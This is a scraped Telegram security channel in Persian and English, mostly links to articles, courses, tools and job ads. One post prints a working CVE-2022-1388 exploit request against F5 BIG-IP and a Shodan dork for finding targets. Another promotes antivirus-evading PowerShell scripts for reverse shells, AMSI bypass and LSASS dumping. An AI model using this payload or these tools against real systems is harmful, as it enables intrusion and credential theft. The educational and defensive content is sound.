458
کانال شخصی امیرحسین تنگسیری نژاد | مهندس و مدرس شبکه و امنیت شبکه〽️ 🔺لینکداین: https://www.linkedin.com/in/amirhoseintangsirinezhad/
🔺️Data Exfiltration Using ICMP Protocol
🔹️ICMP Exfiltration Allow You To Transient Data Into ICMP Packet To A Remote Host (C2 Server)
• Tutorial: https://lnkd.in/dsFh7yJc
📌 ICMP Exfiltration
@AmirHoseinTangsiriNET〽️
🔹حمله فیشینگ ( Phishing ) از طریق فایل ICS
https://security.tosinso.com/fa/articles/44646/
📌 Phishing With ICS File
@AmirHoseinTangsiriNET〽️
🔹یک مخزن بسیار مناسب برای سوالات مربوط به استخدامی در حوزه SOC ارائه شده توسط بستر LetsDefend
بخشی از این سوالات توسط بنده نوشته شده است که توی استخدامی ها و مصاحبه های داخل کشور هم بسیار پرسیده میشوند.
حتما این سوالات رو در نظر داشته باشید موارد زیادی ازشون میتونه توی استخدامی ها پرسیده بشه
https://github.com/LetsDefend/SOC-Interview-Questions
📌 SOC Analyst Interview Questions
@AmirHoseinTangsiriNET〽️
🔹معرفی 13 ابزار تحلیل و شناسایی بدافزار (Malware Analysis)
https://security.tosinso.com/fa/articles/44603/
📌 Malware Analysis
@AmirHoseinTangsiriNET〽️
سلام خدمت عزیزان... دنبال یک نیرو مسلط به تجهیزات F5 ( LTM & ASM ) و Cisco Nexus هستیم توی یه محیط دیتاسنتری به صورت تمام وقت
حقوق براساس توانایی فرد بین 10 تا 15 تومن
عزیزانی که علاقمند هستند لطفا رزومشونو برام یا ایمیل کنند یا به ایدی خودم بفرستند.
AmirHoseinTangsiriNET@gmail.com
@AramesH_AmirHosein
🔹مفهوم Adversary Emulation در امنیت سایبری چیست؟ شبیه سازی دشمن + معرفی ابزارهای پیاده سازی Adversary Emulation
https://security.tosinso.com/fa/articles/44567/
📌 Adversary Emulation
@AmirHoseinTangsiriNET〽️
🔺Kali Linux 2022.2 released
New Tools
🔹BruteShark – A network forensic analysis tool
🔹Evil-WinRM – A Windows Remote Management (WinRM) shell
🔹Hakrawler – A web crawler for easy and quick discovery of endpoints and assets
🔹Httpx – A multi-purpose HTTP toolkit
🔹LAPSDumper – A toold for dumping LAPS passwords
🔹PhpSploit – A stealthy post-exploitation framework
🔹PEDump – A tool for dumping Win32 executable files
🔹SentryPeer – A SIP peer-to-peer honeypot for VoIP
🔹Sparrow-wifi – A graphical Wi-Fi Analyzer for Linux
🔹wifipumpkin3 – A powerful framework for rogue access points attacks
• Download (https://www.kali.org/get-kali)
• Upgrade (https://www.kali.org/docs/general-use/updating-kali/)
📌 News / Kali Linux
@AmirHoseinTangsiriNET〽️
🔺F5 CVE-2022-1388 Vulnerability Scanner
🔹️GitHub: https://github.com/AmirHoseinTangsiriNET/CVE-2022-1388-Scanner
📌 F5
@AmirHoseinTangsiriNET〽️
🔹معرفی و بررسی تکنیک PreOS Boot از تکنیکهای Persistence ثبت شده در MITRE ATT&CK با شناسه T1542
https://security.tosinso.com/fa/articles/44552/
📌 Persistence
@AmirHoseinTangsiriNET〽️
🔹دوره آموزشی MTA با عنوان Malware Traffic Analysis در Tosinso.com (کاملا رایگان) مخصوص افرادی که قصد دارند از پایه تا پیشرفته مباحث تحلیل ترافیک های بدافزارها و ترافیک های مشکوک را قرارگیرند.
👤مدرس: امیرحسین تنگسیری نژاد
🔹این دوره درقالب 30 جلسه آموزش تکمیلی و تئوری مباحثی که مربوط به شناسایی ترافیک های مخرب و ترافیک های بدافزارها و شیوع آنها در شبکه را پوشش داده است و به عنوان یک مکمل برای دوره SANS SEC503 نیز شناخته میشود.
〽️نکته: این دوره کاملا تدریس شده است اما به دلایل تاخیر در تدوین ویدیوها کاملا آپلود نشده اند و هر روز یا یک روز در میون ویدیوهای جدید بارگذاری میشود.
💯به منظور دیدن سرفصل ها و دریافت دوره به لینک زیر مراجعه کنید
📌https://bit.ly/3MqspL9
@AmirHoseinTangsiriNET〽️
اینم از نسخه فارسی این مقاله که قولشو داده بودم...😁
https://security.tosinso.com/fa/articles/44537/
🔹What Is Azure Sentinel? Cloud-Native SIEM
https://smenode.com/what-is-azure-sentinel-cloud-native-siem/
📌 Azure Sentinel
@AmirHoseinTangsiriNET〽️
🔺️PSSW100AVB
🔹️علاقمندان Red Team از دست ندن... یک مخزن بسیار مفید حاوی PowerShell Script های متعدد برای گرفتن دسترسی Reverse Shell و AMSI Bypass و همچنین LSASS Dumping که ویژگی حائز اهمیت این PowerShell Script ها این است که توسط AV ها به صورت 100 درصدی شناسایی نمیشوند... این PowerShell Script ها به همراه زمان ارائه آنها در این مخزن قرار گرفته است که دو عدد از آنها دقیقا همین چند روز پیش قرار داده شدند
از دستش ندید.
https://github.com/tihanyin/PSSW100AVB
📌 AV Bypass
@AmirHoseinTangsiriNET〽️
🔺معرفی آسیب پذیری جدید Java تحت عنوان Spring4Shell به همراه تحلیل ترافیک های شبکه برای شناسایی این حمله
🔹دریافت فایل Pcap استفاده شده در این ویدیو:
https://github.com/DidierStevens/FalsePositives/blob/master/capture-spring4shell.pcap
🔹همچنین لیست منابعی که در ویدیو قولشو دادم روهم میتونید از طریق فایل Pdf زیر داشته باشید...
📌 Spring4Shell
@AmirHoseinTangsiriNET〽️
🔺️Threat Hunting In The Modern SOC
🔹️Table Of Content
• Threat Hunting Vs Incident Response
• Next Generation SOC Stack (Splunk SIEM / Corelight NDR / Splunk Phantom SOAR)
• Corelight And Splunk
• Network Security UseCase
• Threat Hunting Using Splunk And Corelight
https://lnkd.in/dakBuNkx
📌 Splunk
@AmirHoseinTangsiriNET〽️
با سلام
در شرکت Sadad Electronic Payment/ پرداخت الکترونیک سداد ( بانک ملی ) به دنبال افرادی توانمند در حوزه مرکز عمليات امنیت ترجیحا کارشناس سطح 2 میباشیم
توانمندی های مورد نیاز:
شناسایی تهدیدات و پاسخگویی به حوادث
رسیدگی به Ticket های ساخته شده
توانایی حل مشکل و R&D
عزیزانی که مایل هستند گپو گفتی داشته باشیم رزومهشون رو برای من دایرکت ارسال کنند
سوالی هم داشتید میتونید بپرسید.
@AramesH_AmirHosein
🔹معرفی تکنیک Parent-Child Process در تجهیزات امنیتی و نحوه دور زدن آن
https://security.tosinso.com/fa/articles/44647/
📌 Parent-Child Process
@AmirHoseinTangsiriNET〽️
🔹7 نکته برای امن سازی پروتکل SSH
https://security.tosinso.com/fa/articles/44604/
📌 SSH
@AmirHoseinTangsiriNET〽️
🔹قوانین Sigma چیست؟ راهنما نوشتن قوانین Sigma
https://security.tosinso.com/fa/articles/44599/
📌 Sigma Rule
@AmirHoseinTangsiriNET〽️
🔹بدافزار بدون فایل ( Fileless Malware ) چیست؟
https://security.tosinso.com/fa/articles/44597/
📌 Fileless Malware
@AmirHoseinTangsiriNET〽️
🔺️OpenEDR ( Free Epoint Detection And Response )
🔹️OpenEDR is a free platform which allows you to analyze what's happening across your entire environment at base-security-event level. The agent records all telemetry information locally and will send the data to locally hosted or cloud hosted ElasticSeach deployments.
🔹️Endpoint detection and response (EDR), also known as endpoint threat detection and response (ETDR), is an integrated endpoint security solution that combines real-time continuous monitoring and collection of endpoint data with rules-based automated response and analysis capabilities.
• Website: https://openedr.com/
• Github: https://lnkd.in/evsCzTyy
• Release: https://lnkd.in/ehxqtZED
📌 EDR
@AmirHoseinTangsiriNET〽️
🔹معرفی 15 ابزار پرکاربرد در تیم های آبی (BlueTeams)
https://security.tosinso.com/fa/articles/44563
📌 Blue Team
@AmirHoseinTangsiriNET〽️
🔺️BIG-IP iControl REST vulnerability CVE-2022-1388
🔹️This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.
🔹️Details: https://lnkd.in/emtA8JCk
🔹️CVE-2022-1388 Cheacker (https://lnkd.in/eUh4NHtN)
🔹️CVE-2022-1388 Exploit (https://lnkd.in/eCEp8_b3)
🔹️Request:
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive, X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: vvs
Authorization: Basic YWRtaW46
{
"command":"run",
"utilCmdArgs":"-c id"
}
🔹️Shodan Dork:
http.title:"BIG-IP®-+Redirect" +"Server"
📌 F5
@AmirHoseinTangsiriNET〽️
🔺️MITRE ATT&CK Version 11.0 Release (25 April 2022)
MITRE ATT&CK v11
🔹️https://lnkd.in/gSzMfU-B
MITRE ATT&CK April Update
🔹️https://lnkd.in/g5Ayj39g
📌MITRE ATT&CK
@AmirHoseinTangsiriNET〽️
🔺دوره آموزشی رایگان Sysmon
🔹توی این دوره قصد دارم از پایه مبحث Sysmon رو براتون شرح بدم و باهم ببریم جلو... این دوره کاملا رایگانه و خب به زبان انگلیسیم هست ولی دوره که تکمیل شد احتمالش هست که به صورت فارسی هم براتون بزارم اما فعلا انگلیسی هست...
دوره هنوز تکمیل نشده و صرفا سه قسمت ازش تکمیل شده به مرور هر چند قسمت که تکمیل بشه رو براتون اینجا قرار میدم
• Part 1: What Is Threat Hunting? (https://smenode.com/sysmon-101-what-is-threat-hunting/)
• Part 2: What Is Sysmon? And How To Install Sysmon (https://smenode.com/sysmon-101-what-is-sysmon-and-how-to-install-sysmon/)
• Part 3: Sysmon Events ID For Threat Hunting (https://smenode.com/sysmon-101-sysmon-events-id-for-threat-hunting/)
📌 Sysmon
@AmirHoseinTangsiriNET〽️
پانوشت: احتمالا نسخه فارسیشم بنویسم... همینجا منتشر میکنم براتون
Читать полностью…
🔺️Network Layers Attacks MindMap
🔹️توی این MindMap سعی کردم اکثر حملاتی که در لایه های مختلف شبکه رخ میدهد را به همراه ابزارهای که جهت پیاده سازی آن استفاده میشود رو دسته بندی کنم و قرار بدم... امیدوارم ازش لذت ببرید و کارآمد باشه براتون
📌 Network Layers Attacks MindMap
@AmirHoseinTangsiriNET〽️
🔺️Spring4Shell Resources
🔹️A Set Of Video, Artcles, Tools And Exploit For
Spring4Shell Attack
@AmirHoseinTangsiriNET〽️
🔺️Bug Bounty And Vulnerability Report Generator
🔹️علاقمندان و فعالین حوزه Bug Bounty برای نوشتن گزارش آسیب پذیری این پلتفروم رو از دست ندید... به صورت خودکار سازی شده فقط با پر کردن یک سری بخش های مشخص براتون گزارش آسیب پذیری رو در قالب و فرمت های که تعیین میکنید ایجاد و ارایه میکنه
https://buer.haus/breport/
🔹️همچنین پلتفروم جالب دیگه ای هم که برای ایجاد گزارش آسیب پذیری مورد استفاده قرار میگیره هم Vulnrepo هست که اینم به صورت خودکار سازی شده عمل میکنه و قابلیت های متنوع از جمله شخصی سازی گزارش، انتخاب فرمت و... رو در اختیار ما میزاره
https://lnkd.in/dBM9T3vV
• نکته اول: هردو این پلتفروم ها رایگان و آزاد هستند.
• نکته دوم: نوشتن یک گزارش خوب با قالب و طرحی حرفه ای خیلی میتونه توجه خواننده رو جلب کنه...
📌 Report
@AmirHoseinTangsiriNET〽️
🔺️Free Hands-On Splunk Lab & Tutorials
🔹️بستر BOTS Splunk دراصل یک محیط ارائه شده توسط خوده Splunk هست جهت اینکه سناریوهای دنیای واقعی را در حوزه های مختلف امنیت از جمله Threat Hunting، Incident Response و تحلیل ترافیک و حملات به واسطه Splunk را درقالب محیط Lab آنلاین قابل دسترس از طریق مرورگر و آموزش ها و چالش های CTF به علاقمندان ارائه کند... در این محیط به راحتی میتوانید مهارتهای خود را در تحلیل به واسطه Splunk ارتقا بدید و به چالش بکشید...
نکته قابل توجه در رابطه با این بستر این میباشد که تمامی سناریوها و چالش ها و محیط های تمرین به صورت آنلاین و بر روی زیرساخت خوده Splunk راه اندازی شده اند و شما به راحتی از طریق مرورگر خود بدون نیاز به راه اندازی محیط تمرین بر روی سیستم شخصیتان میتوانید به محیط مورد نظرتان دسترسی پیدا کنید
دسترسی به BOTS Splunk(عزیزانی که در ایران تشریف دارند حتما از فیلترشکن استفاده کنند.):
https://bots.splunk.com/
📌 Splunk
@AmirHoseinTangsiriNET〽️